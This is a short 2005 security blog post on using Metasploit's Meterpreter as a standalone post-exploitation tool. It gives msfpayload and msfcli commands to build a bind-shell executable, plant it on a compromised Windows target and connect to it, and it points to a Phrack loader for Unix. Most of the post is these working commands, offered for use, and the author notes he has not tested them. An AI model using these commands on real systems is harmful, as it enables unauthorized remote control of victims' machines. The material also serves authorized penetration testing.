Wednesday, October 26, 2005

Using Meterpreter as a standalone utility

Post-exploitation techniques are a cool topic, these days i read a thread in Metasploit Mailing list
about using Meterpreter payload as a standalone utility, for example after exploiting sql injection you can upload meterpreter and work through it. Well here is some fast example on how to achieve this.

To create the meterpreter server:

$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.

After executing it, you can use the "payload_handler" exploit to connect
and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 RHOST= E

I haven't time to test it but i think it works.

This is great for windows, if the target system is a Unix you could rely on S.E.L.F (Shellcode Elf Loader, another focus for the same objective "post-exploitation", i recommend to take a look at S.E.L.F. Phrack article.

No comments:

Wfuzz 2.2.0 released

I'm pleased to announce a new version of WFuzz! Wfuzz has been created to facilitate the task in web applications assessments and it...